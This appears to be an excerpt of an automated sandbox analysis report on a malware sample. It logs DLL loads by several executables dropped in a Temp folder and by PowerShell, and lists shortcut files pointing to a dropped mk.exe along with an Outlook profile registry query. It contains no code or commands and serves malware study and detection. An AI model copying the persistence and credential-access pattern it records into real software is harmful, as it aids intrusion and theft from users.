Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: powrprof.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: prua.lnk.24.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: yiuq.lnk.42.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: zzvy.lnk.46.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: dslm.lnk.50.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: tytb.lnk.53.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: akdz.lnk.56.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: kncs.lnk.59.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: syie.lnk.62.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe
Source: xsap.lnk.65.dr	LNK file: ..\..\..\..\..\..\Local\Temp\1006034001\mk.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1799168 > 1048576

Source: file.exe

